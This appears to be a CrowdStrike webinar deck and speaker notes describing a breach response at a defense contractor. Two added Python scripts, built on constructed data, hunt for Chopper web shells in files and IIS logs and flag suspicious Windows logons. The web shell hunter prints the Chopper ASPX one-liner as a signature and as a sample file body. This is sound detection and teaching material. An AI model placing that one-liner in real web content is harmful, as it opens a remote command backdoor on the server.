Today’s attackers are more brazen and patient than ever – often masquerading as legitimate users while they search the victim’s environment for their most prized data. And the longer these attackers remain undetected, the greater the cost to the business, be that your reputation or loss of IP. Therefore, organizations must detect and respond to incidents as quickly, efficiently and accurately as possible.
In this webinar, we provide unique insights into how one Fortune 500 organization successfully responded to a sustained and sophisticated breach. You’ll hear from the incident responders and digital forensics experts who actually worked the case, and learn the cutting-edge techniques that were used. We will cover topics such as:
* Typical infrastructure weaknesses prevalent in organizations today
* How attackers exploit IT infrastructure weaknesses
* The prevalence of attacker attempts to re-enter environments, even after full remediation
* How state-of-the-art digital detection and forensics tools like Falcon Host & Falcon Forensics speed remediation by providing immediate visibility AND a rear-view mirror look at past activities
incident response, DFIR, reducing dwell time, cybersecurity, cyber security, best practices
2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
AGENDA:
1 INTRODUCTION
2 CURRENT INCIDENT RESPONSE TRENDS
3 CROWDSTRIKE’S INVESTIGATIVE METHODOLOGY
4 IR CASE OVERVIEW AND SEQUENCE OF EVENTS
6 DETECTING ATTACKERS BEFORE THEY GET BACK IN
7 KEY TAKEAWAYS
8 Q&A
RYAN JAFARKHANI
PRINCIPAL CONSULTANT
SPECIALIZED EXPERIENCE IN:
• Host & Network Forensics
• Malware Analysis/Reverse Engineering
• Intel/Attribution
HAS WORKED 70+ INVESTIGATIONS IN:
• State Sponsored
• Financial Crime
• Insider Threats
6+ YEARS
PRIOR TO CROWDSTRIKE:
ERIC OPDYKE
CONSULTANT
SPECIALIZED EXPERIENCE IN:
• Host & Network Forensics
• Malware Analysis/Reverse Engineering
• Penetration Testing
• State sponsored attacks
6+ YEARS
PRIOR TO CROWDSTRIKE:
MOST COMMON BREACH TYPES:
• Intellectual Property (IP) Theft
• Monetary Theft
• Web Server Compromise
• Data Destruction
• Credential Theft
MOST COMMON INITIAL ATTACK VECTORS:
• Distributed Denial of Service (DDoS)
• Web Server Vulnerabilities
• Web Application Vulnerabilities
• Misconfigured DMZ Servers
• Spear Phishing
• Third-party Trust Relationships
• Strategic Web Compromise
• Weak Authentication Mechanisms
• Malicious Insider Threats
• SQL Injection
INCIDENT RESPONSE TRENDS
1: MULTIPLE ATTACKERS
In 25% of CrowdStrike’s engagements, we identified multiple distinct adversaries in the client environment.
2: REINFECTION ATTEMPTS
On average, adversaries engage in reinfection attempts within two days of comprehensive remediation efforts.
3: SELF DETECTION RATES IMPROVING
CrowdStrike has seen a marked increase in the number of organizations self-detecting breaches, far above what has been previously reported.
4: CREDENTIALS A CRITICAL TARGET
Regardless of adversary or motivation, the most common goal of attackers is to secure domain and enterprise credentials.
5: COMPROMISED ACCOUNTS HOARDED
Unlike large-scale attacks of the past, adversaries no longer need to compromise hundreds of accounts to accomplish their objectives.
6: VARIATION IN DURATION
The review of CrowdStrike investigations found wide variation in the duration of investigations.
TRADITIONAL IR = SLOW RESPONSE
Customers wait for a remediation plan before any actual remediation work occurs.
[Timeline figure: stages BREACH, DISCOVERY, IR START, VISIBILITY, REMEDIATE, IR FINISHED; intervals labelled MONTHS, MANY DAYS, WEEKS and MONTHS]
INCIDENT RESPONSE SERVICES
By providing the client an immediate and comprehensive view into attacker activity, we stop breaches fast.
• Identify how attackers have been or are accessing the client’s environment
• Mitigate attackers’ existing access with appropriate methods
• Determine methods to track future actions and block future access
END GOAL: Get customers back to normal business operations quickly
INVESTIGATIVE METHODOLOGY
The power of Falcon Host and Falcon Intelligence provides immediate visibility and threat actor information that informs our remediation efforts – and gets our clients back to business FAST.
[Figure: SERVICES, FALCON INTEL, FALCON HOST]
IR CASE: BACKGROUND
Client: Research and Technology defense contractor
FBI notified the client of breach February 2015
Data theft occurred over Christmas 2014
Two foreign IP addresses were involved
CrowdStrike Services was engaged, responded and was on-site within 24 hours
OVERALL ENGAGEMENT GOALS
GAIN VISIBILITY by deploying technical tools to 200 hosts
ANSWER: Who? What? Where? When? How?
MAIN TOOLS USED DURING ENGAGEMENT:
- Falcon Host: provides real-time visibility and answers: “What’s happening now?”
- Falcon Forensic Collector: provides rear-views, answers: “What happened in the past?”
- Deploy network monitoring technology to main egress points
IR CASE: INFRASTRUCTURE WEAKNESSES
No central logging for any log sources
Local users had administrative privileges
Shared local administrator account enabled
Service accounts with Domain Admin privileges
Flat network (DMZ can access corporate network)
THESE ARE TYPICAL INFRASTRUCTURE WEAKNESSES CROWDSTRIKE SERVICES ENCOUNTERS
REARVIEW INSIGHTS WITH FALCON FORENSICS
Services team utilized Falcon Forensics Collector (FFC): a Windows console application designed to gather system information for incident response engagements.
Collects information such as drivers, directory listings, hashes, registry entries, event log entries and much more.
Supports full disk forensics and established the attacker’s past activities.
Enables the Services team to provide the client with instantaneous evidence of attacker activity.
IR CASE TIMELINE OF EVENTS
OCT. 13, 2011 – FIRST ATTACKER ACTIVITY: RAN REMOTE EXECUTION UTILITY ON CLIENT’S SERVER
JAN. 15, 2014 – SECOND ATTACKER ACTIVITY: RAN REMOTE SCANNER ON CLIENT SERVER
JULY 14, 2014 – ATTACKER LEVERAGED CREDENTIAL THEFT UTILITIES AND REMOTE ACCESS CAPABILITIES. GOAL: ACCESS INFORMATION WITHIN THE CLIENT'S ENVIRONMENT AND ALSO GAIN FUTURE ACCESS.
JULY 24, 2014 – INITIAL DATA THEFT BEGINS
■ Falcon Forensics identified data theft that started and continued to Feb. 2015
■ Attacker utilized C# Chopper Web Shell components on OWA servers.
■ From July to Nov. 2014, the attacker periodically dumped credentials on the client's domain controller and cached credentials on other hosts in the environment.
IR CASE TIMELINE OF EVENTS – CONTINUED
DEC. 25-29, 2014 – SECOND DATA THEFT OCCURS: RAN REMOTE EXECUTION UTILITY ON CLIENT’S SERVER
FEB. 7, 2015 – FBI NOTIFIES CLIENT OF ATTACK THAT OCCURRED DEC. 25
FEB. 9, 2015 – CROWDSTRIKE IR ENGAGEMENT BEGINS
FEB. 17, 2015 – ATTACKER LEVERAGED THE WEB SHELL ON CLIENT WEB SERVER TO CONDUCT RECONNAISSANCE AND ACCESSED SEVERAL SERVER DIRECTORIES AND FILES
FEB. 17-24, 2015 – FORENSICS AND REMEDIATION PERIOD: ATTACKER EJECTED FROM CLIENT’S ENVIRONMENT
100 HOURS TO REMEDIATION
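One way to hunt for the Chopper web shell activity the timeline describes on the OWA servers. This is an added example, not code from the deck or from CrowdStrike, and not output from the case: the ASPX file bodies, the IIS W3C log lines, the host paths and the IP addresses are constructed for illustration, and the dates were picked to fit the narrative rather than taken from it. It pairs a content signature (the Chopper server side is a one-line eval of a request parameter with the "unsafe" flag) with a traffic heuristic (a shell page is driven only by POST requests, so an .aspx path that receives POSTs but is never fetched with GET stands out). Legitimate POST-only pages exist, so the second check is a triage filter to be confirmed against file content and timestamps, not a verdict on its own.

```python
"""Hunt for Chopper-style ASP.NET web shells on an IIS/OWA server.

Added example. The sample files and log lines below are constructed,
not taken from any real engagement.
"""
import re
from collections import defaultdict

# The Chopper ASPX server side is a one-liner of the form
#   <%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>
# so the signature is eval() of a request value with the "unsafe" flag.
CHOPPER_RE = re.compile(
    r'eval\s*\(\s*Request\.(?:Item|Form|Params)\s*\[[^\]]+\]\s*,\s*"unsafe"\s*\)',
    re.IGNORECASE,
)

# Constructed web content: path -> file body (hypothetical paths).
SAMPLE_FILES = {
    r"C:\inetpub\wwwroot\owa\auth\logon.aspx":
        '<%@ Page Language="C#" %>\n<html><body>OWA logon form</body></html>',
    r"C:\inetpub\wwwroot\owa\auth\errorFE.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    r"C:\inetpub\wwwroot\aspnet_client\system_web\help.aspx":
        '<%@ Page Language="C#" %>\n<%= "static help page" %>',
}

# Constructed IIS W3C extended log; the #Fields: line drives the parser.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status time-taken
2014-12-26 03:12:07 10.1.5.20 GET /owa/auth/logon.aspx url=/owa 443 - 203.0.113.7 Mozilla/5.0 200 31
2014-12-26 03:12:09 10.1.5.20 POST /owa/auth.owa - 443 - 203.0.113.7 Mozilla/5.0 302 48
2014-12-26 03:14:51 10.1.5.20 POST /owa/auth/errorFE.aspx - 443 - 198.51.100.23 Mozilla/4.0 200 120
2014-12-26 03:15:03 10.1.5.20 POST /owa/auth/errorFE.aspx - 443 - 198.51.100.23 Mozilla/4.0 200 2210
2014-12-26 03:20:00 10.1.5.20 GET /owa/auth/logon.aspx url=/owa 443 - 203.0.113.9 Mozilla/5.0 200 29
2014-12-26 03:21:14 10.1.5.20 GET /aspnet_client/system_web/help.aspx - 443 - 203.0.113.9 Mozilla/5.0 200 12
"""


def scan_file_contents(files):
    """Return the paths whose body matches the Chopper eval signature."""
    return sorted(path for path, body in files.items() if CHOPPER_RE.search(body))


def parse_w3c_log(lines):
    """Yield one dict per request from IIS W3C log lines, naming columns from #Fields:."""
    fields = None
    for raw in lines:
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):          # skip truncated or garbled rows
            yield dict(zip(fields, values))


def post_only_aspx(records):
    """Return {uri_stem: (post_count, [client_ips])} for .aspx pages that
    received POST requests but never a GET, the access pattern of a shell."""
    methods = defaultdict(lambda: defaultdict(int))
    clients = defaultdict(set)
    for rec in records:
        stem = rec["cs-uri-stem"].lower()
        if not stem.endswith(".aspx"):
            continue
        method = rec["cs-method"].upper()
        methods[stem][method] += 1
        if method == "POST":
            clients[stem].add(rec["c-ip"])
    return {
        stem: (counts["POST"], sorted(clients[stem]))
        for stem, counts in methods.items()
        if counts["POST"] and not counts["GET"]
    }


def hunt(files, log_text):
    """Run both checks and return the combined findings."""
    return {
        "signature_hits": scan_file_contents(files),
        "post_only_pages": post_only_aspx(parse_w3c_log(log_text.splitlines())),
    }


if __name__ == "__main__":
    for key, value in hunt(SAMPLE_FILES, SAMPLE_IIS_LOG).items():
        print(key, value)
```

On the sample data both checks converge on the same page: the signature scan flags errorFE.aspx, and the log shows that page receiving only POSTs from a single external address while the real logon page is fetched with GET. The next step in the rearview analysis is to take the file's creation time and the first POST to it as the earliest bound for the intrusion on that host.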
IR CASE ATTACK IMPACT
THE DAMAGE? Theft of more than 500 GB of proprietary data
EARLIEST EVIDENCE OF ATTACKER ACTIVITY: October 2011
ATTACKER TTPs AND THEIR IMPACT:
Leveraged web shells as primary backdoor
Used Administrator and Service accounts
Attacker leveraged TeamViewer and Remote Desktop to move laterally
41 pieces of malware and utilities
49 compromised accounts
14 compromised and/or accessed systems
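The rearview side of this case is event-log analysis of the kind the collected event log entries support: which accounts logged on where, from where, and how fast. This is an added example, not CrowdStrike code or data from the engagement, covering the two TTPs listed above (Administrator and service accounts, Remote Desktop for lateral movement) and the flat DMZ-to-corporate network noted under infrastructure weaknesses. The Security event 4624 records (a JSON-lines export), account names, hostnames and address ranges are constructed, and the service-account list and DMZ subnet are assumptions a responder would replace with the client's own.

```python
"""Flag suspicious Windows logons (event 4624) in an exported event set.

Added example with constructed data. Three rules:
  service_account_interactive  a service account used for an RDP/console logon
  logon_from_dmz               a logon whose source address sits in the DMZ
  lateral_fanout               one account reaching >= FANOUT hosts within WINDOW
"""
import ipaddress
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Assumptions a responder fills in from the client's environment.
SERVICE_ACCOUNTS = {"svc_backup", "svc_sql"}          # known service accounts
DMZ_NETS = [ipaddress.ip_network("10.200.0.0/16")]    # assumed DMZ address range
INTERACTIVE_TYPES = {2: "console", 10: "rdp"}         # 4624 LogonType values
WINDOW = timedelta(hours=1)
FANOUT = 3

# Constructed 4624/4634 records, one JSON object per line (hypothetical hosts).
SAMPLE_EVENTS = """\
{"EventID":4624,"TimeCreated":"2014-12-25T22:03:11","Computer":"FILESRV01","TargetUserName":"svc_backup","LogonType":10,"IpAddress":"10.200.4.15"}
{"EventID":4624,"TimeCreated":"2014-12-25T22:10:40","Computer":"HOST-A","TargetUserName":"Administrator","LogonType":10,"IpAddress":"10.10.1.50"}
{"EventID":4624,"TimeCreated":"2014-12-25T22:14:02","Computer":"HOST-B","TargetUserName":"Administrator","LogonType":3,"IpAddress":"10.10.1.50"}
{"EventID":4634,"TimeCreated":"2014-12-25T22:15:00","Computer":"HOST-A","TargetUserName":"Administrator","LogonType":10,"IpAddress":"-"}
{"EventID":4624,"TimeCreated":"2014-12-25T22:20:19","Computer":"DC01","TargetUserName":"Administrator","LogonType":3,"IpAddress":"10.10.1.50"}
{"EventID":4624,"TimeCreated":"2014-12-26T08:30:00","Computer":"WS042","TargetUserName":"jsmith","LogonType":2,"IpAddress":"-"}
"""


def load_events(text):
    """Parse JSON-lines records, convert timestamps, and sort chronologically."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["TimeCreated"] = datetime.fromisoformat(rec["TimeCreated"])
        events.append(rec)
    return sorted(events, key=lambda r: r["TimeCreated"])


def source_ip(rec):
    """Return the source as an ip_address, or None for '-', loopback and garbage."""
    try:
        addr = ipaddress.ip_address(rec.get("IpAddress", "-"))
    except ValueError:
        return None
    return None if addr.is_loopback else addr


def analyse(events, window=WINDOW, fanout=FANOUT):
    """Apply the three rules and return a list of finding dicts."""
    findings = []
    by_user = defaultdict(list)
    for rec in events:
        if rec["EventID"] != 4624:
            continue
        user = rec["TargetUserName"].lower()
        host, when, src = rec["Computer"], rec["TimeCreated"], source_ip(rec)
        if user in SERVICE_ACCOUNTS and rec["LogonType"] in INTERACTIVE_TYPES:
            findings.append({"rule": "service_account_interactive", "user": user,
                             "host": host, "via": INTERACTIVE_TYPES[rec["LogonType"]],
                             "at": when})
        if src and any(src in net for net in DMZ_NETS):
            findings.append({"rule": "logon_from_dmz", "user": user, "host": host,
                             "source": str(src), "at": when})
        by_user[user].append((when, host))
    # Sliding window: distinct hosts one account reached within `window`.
    for user, logons in by_user.items():
        for i, (start, _) in enumerate(logons):
            hosts = {h for t, h in logons[i:] if t - start <= window}
            if len(hosts) >= fanout:
                findings.append({"rule": "lateral_fanout", "user": user,
                                 "hosts": sorted(hosts), "from": start})
                break          # one finding per account is enough for triage
    return findings


if __name__ == "__main__":
    for finding in analyse(load_events(SAMPLE_EVENTS)):
        print(finding)
```

With no central logging, as in this case, the input has to be assembled from each host's Security log, so the sort in load_events matters: the fan-out rule only works once records from FILESRV01, HOST-A, HOST-B and DC01 sit in one timeline.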
FALCON HOST DETECTS AND KEEPS THE ATTACKER OUT
After remediation, the attacker returned to the environment, which is common.
But detecting a returning attacker and reacting quickly is not common.
From the initial email alert Falcon Host generated, it took the client less than 45 minutes to react and pull the systems affected.
Client permanently decommissioned systems.
We haven’t heard a peep since.
CLIENT RECOMMENDATIONS TO PREVENT FUTURE BREACHES
Client should continue focus on detection
Review logs available
Utilize effective host-based and network-based visibility tools to monitor for activity
Goals: identify future activity quickly and take remediation actions based on detection
REMEDIATION-FOCUS IR = FAST RECOVERY
We start immediately to mitigate damage and remove attackers.
[Timeline figure: stages BREACH & DISCOVERY, IR START, VISIBILITY (FALCON HOST), REMEDIATE, IR FINISHED; intervals labelled HOURS, HOURS and DAYS/WEEKS]
KEY TAKEAWAYS
Expert IR practitioners can leverage your security investments and the latest technology
Choose an IR team that partners with clients to ensure effective engagements
Effective IR staff prepare you for the future by transferring knowledge to the client’s IT staff
Documentation should be clear and recommendations should be actionable
WE STOP BREACHES
CROWDSTRIKE TOTAL VALUE
ENDPOINT PROTECTION
MANAGED HUNTING
RESPONSE SERVICES
THREAT INTELLIGENCE
PEOPLE, PROCESS, TECHNOLOGY, INTELLIGENCE
OUR CUSTOMERS
YOUR NEXT STEP: COMPROMISE ASSESSMENT
An IR engagement provides clients an immediate and comprehensive view into attacker activity:
1 Are there signs of current or past targeted attack?
2 Who is the adversary? Can you help eject him?
3 How should we reduce risk of future attacks?
Join us March 15th as we provide unique insights into how one F500 organization successfully responded to a sustained and sophisticated breach. You’ll hear from the incident responders and digital forensics experts who actually worked the case, and learn the cutting-edge techniques that were used. We will cover topics such as:
Typical infrastructure weaknesses prevalent in organizations today
How attackers exploit IT infrastructure weaknesses
The prevalence of attacker attempts to re-enter environments, even after full remediation
How state-of-the-art digital detection and forensics tools like Falcon Host & Falcon Forensics speed remediation by providing immediate visibility AND rear-view mirror look at past activities
The CrowdStrike Services team offers the full spectrum of proactive and response services to help customers respond tactically to cybersecurity incidents as well as continually mature and strategically evolve their overall security posture.
Chopper is a feature rich web shell that gives attackers the ability to manipulate files and databases; it also provides remote command shell access.
Q for CS team: how far into the weeds do we want to go in describing attacker methods (i.e. using the Chopper web shell to exploit an OWA/Exchange server weakness)? Would we need to point out that Microsoft has since fixed this vulnerability?
REMIND THE AUDIENCE THAT THE CASE WE JUST STUDIED TOOK 100 HOURS TOTAL FOR FORENSICS AND REMEDIATION
Falcon Intelligence aids Services by providing current IOCs, IOAs and adversary-specific profiles: our team knows what to look for BEFORE an engagement starts.
Falcon Host provides immediate visibility to see what attackers are doing. Net result? Remediation efforts are completed in days and weeks, not months.
HOWEVER, OUR SERVICES TEAM IS TECHNOLOGY AGNOSTIC: if you have made an investment in another endpoint detection & response tool, our team can make use of it.
This is about helping you, the client, remediate the situation.
CrowdStrike Total Value
Next step: establish the status of your environment with a compromise assessment.
We will assess your environment for threats that may already have established a presence in your network. We will seek to answer these questions:
• Is there currently targeted attack activity affecting your operations?
• What can you do to reduce the risk of a targeted attack?
• How can you deter and prevent attacks that target your environment and confidential customer information?
Of all our proactive services, this is perhaps the most important: perhaps you had a CA six months ago. Great, but do you know what your environment status is now?
Thank you for attending today’s CrowdCast on taking the dwell time out of an incident response engagement.
As I mentioned when we started, we’d leave about 10-15 minutes for questions, so if you haven’t already, go ahead and post your questions in the Zoom chat window.
We’ll do our best to answer as many of these as we can.
So that wraps up this CrowdCast today!
Thanks to Eric and Ryan from the Crowdstrike Services team for their valuable time and insights on working quickly to get one of our customers back to business quickly.
Visit the URL displayed to learn more.
We will send a follow-up email with more information on our Compromise Assessment offering to help you bolster your organization’s security posture.